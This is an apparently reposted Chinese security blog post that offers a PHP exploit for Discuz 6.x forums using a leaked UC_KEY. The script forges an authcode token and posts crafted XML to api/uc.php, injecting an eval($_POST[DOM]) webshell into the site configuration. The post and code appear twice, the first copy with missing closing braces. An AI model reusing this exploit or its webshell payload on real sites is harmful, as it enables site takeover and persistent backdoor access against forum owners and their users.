DZ6.x的UC_KEY getwebshell exploit

暗月博客 2019年11月21日22:06:57评论457 views字数 2881阅读9分36秒阅读模式
摘要

网上有dz 7.x和dz x系列的uc_key 利用方式,今天遇到了一个dz6.0的网站,于是分析了下代码,改了下利用程序,分享给需要的人。uc_key getshell 是一个影响比较广存在比较久的漏洞 ,基本上使用ucenter做用户中心的程序都可以使用,但需要根据特定程序写特定利用。最新版本的dz好像是修补了,没有具体看代码了。 

ps:需要或者感觉不错的请挥挥你的小手 点击 “ 顶” 

注意三个地方: 
1.在dz6.x中对xml的解析是不一样的,所以需要修改利用exp 
$post = uc_unserialize(uc_post_contents());

2.低版本中$UC_API并没有转义,所以不需要提交2个包 
$configfile = preg_replace("/define/('UC_API',/s*'.*?'/);/i", "define('UC_API', '$UC _API');", $configfile);

3.低版本的加密函数也是不一样的 

<?php 
// 代码版权归原作者所有! 
    $timestamp = time()+10*3600; 
    $host="127.0.0.1"; 
    $uc_key="Qfp1O0N3h5V356bbUdPer3958dp8X3b55dBa9fKai7s3Q7AbY9I3Hcnc7ec505sa"; 
    $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key)); 
    $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?> 
<root> 
<UC _API id="UC _API">http://xxx/');eval($_POST[DOM]);//</UC_API> 
</root >'; 
    $html1 = send($cmd1); 
    echo $html1; 

function send($cmd){ 
    global $host,$code; 
    $message = "POST /dz/api/uc.php?code=".$code."  HTTP/1.1/r/n"; 
    $message .= "Accept: */*/r/n"; 
    $message .= "Referer: ".$host."/r/n"; 
    $message .= "Accept-Language: zh-cn/r/n"; 
    $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; 
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n";
    $message .= "Host: ".$host."/r/n"; 
    $message .= "Content-Length: ".strlen($cmd)."/r/n"; 
    $message .= "Connection: Close/r/n/r/n"; 
    $message .= $cmd; 
    $fp = fsockopen($host, 80); 
    fputs($fp, $message); 
    $resp = ''; 

    while ($fp && !feof($fp)) 
        $resp .= fread($fp, 1024); 

    return $resp; 

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { 
  $ckey_length = 4; 
  $key = md5($key ? $key : UC_KEY); 
  $keya = md5(substr($key, 0, 16)); 
  $keyb = md5(substr($key, 16, 16)); 
  $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; 
  $cryptkey = $keya.md5($keya.$keyc); 
  $key_length = strlen($cryptkey); 
  $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; 
  $string_length = strlen($string); 
  $result = ''; 
  $box = range(0, 255); 
  $rndkey = array(); 
  for($i = 0; $i <= 255; $i++) { 
    $rndkey[$i] = ord($cryptkey[$i % $key_length]); 
  } 
  for($j = $i = 0; $i < 256; $i++) { 
    $j = ($j + $box[$i] + $rndkey[$i]) % 256; 
    $tmp = $box[$i]; 
    $box[$i] = $box[$j]; 
    $box[$j] = $tmp; 
  } 
  for($a = $j = $i = 0; $i < $string_length; $i++) { 
    $a = ($a + 1) % 256; 
    $j = ($j + $box[$a]) % 256; 
    $tmp = $box[$a]; 
    $box[$a] = $box[$j]; 
    $box[$j] = $tmp; 
    $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); 
  } 
  if($operation == 'DECODE') { 
    if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { 
      return substr($result, 26); 
    } else { 
      return ''; 
    } 
  } else { 
    return $keyc.str_replace('=', '', base64_encode($result)); 
  } 

?>

网上有dz 7.x和dz x系列的uc_key 利用方式,今天遇到了一个dz6.0的网站,于是分析了下代码,改了下利用程序,分享给需要的人。uc_key getshell 是一个影响比较广存在比较久的漏洞,基本上使用ucenter做用户中心的程序都可以使用,但需要根据特定程序写特定利用。最新版本的dz好像是修补了,没有具体看代码了。 

ps:需要或者感觉不错的请挥挥你的小手 点击 “ 

注意三个地方: 
1.在dz6.x中对xml的解析是不一样的,所以需要修改利用exp 
$post = uc_unserialize(uc_post_contents());

2.低版本中$UC_API并没有转义,所以不需要提交2个包 
$configfile = preg_replace("/define/('UC_API',/s*'.*?'/);/i", "define('UC_API', '$UC_API');", $configfile);

3.低版本的加密函数也是不一样的 

<?php 
// 代码版权归原作者所有! 
    $timestamp = time()+10*3600; 
    $host="127.0.0.1"; 
    $uc_key="Qfp1O0N3h5V356bbUdPer3958dp8X3b55dBa9fKai7s3Q7AbY9I3Hcnc7ec505sa"; 
    $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key)); 
    $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?> 
<root> 
<UC_API id="UC_API">http://xxx/');eval($_POST[DOM]);//</UC_API> 
</root>'; 
    $html1 = send($cmd1); 
    echo $html1; 

function send($cmd){ 
    global $host,$code; 
    $message = "POST /dz/api/uc.php?code=".$code."  HTTP/1.1/r/n"; 
    $message .= "Accept: */*/r/n"; 
    $message .= "Referer: ".$host."/r/n"; 
    $message .= "Accept-Language: zh-cn/r/n"; 
    $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; 
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n";
    $message .= "Host: ".$host."/r/n"; 
    $message .= "Content-Length: ".strlen($cmd)."/r/n"; 
    $message .= "Connection: Close/r/n/r/n"; 
    $message .= $cmd; 
    $fp = fsockopen($host, 80); 
    fputs($fp, $message); 
    $resp = ''; 

    while ($fp && !feof($fp)) 
        $resp .= fread($fp, 1024); 

    return $resp; 
} 

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { 
  $ckey_length = 4; 
  $key = md5($key ? $key : UC_KEY); 
  $keya = md5(substr($key, 0, 16)); 
  $keyb = md5(substr($key, 16, 16)); 
  $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; 
  $cryptkey = $keya.md5($keya.$keyc); 
  $key_length = strlen($cryptkey); 
  $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; 
  $string_length = strlen($string); 
  $result = ''; 
  $box = range(0, 255); 
  $rndkey = array(); 
  for($i = 0; $i <= 255; $i++) { 
    $rndkey[$i] = ord($cryptkey[$i % $key_length]); 
  } 
  for($j = $i = 0; $i < 256; $i++) { 
    $j = ($j + $box[$i] + $rndkey[$i]) % 256; 
    $tmp = $box[$i]; 
    $box[$i] = $box[$j]; 
    $box[$j] = $tmp; 
  } 
  for($a = $j = $i = 0; $i < $string_length; $i++) { 
    $a = ($a + 1) % 256; 
    $j = ($j + $box[$a]) % 256; 
    $tmp = $box[$a]; 
    $box[$a] = $box[$j]; 
    $box[$j] = $tmp; 
    $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); 
  } 
  if($operation == 'DECODE') { 
    if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { 
      return substr($result, 26); 
    } else { 
      return ''; 
    } 
  } else { 
    return $keyc.str_replace('=', '', base64_encode($result)); 
  } 
} 
?>

http://zone.wooyun.org/content/23953

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日22:06:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DZ6.x的UC_KEY getwebshell exploithttps://cn-sec.com/archives/72847.html

发表评论

匿名网友 填写信息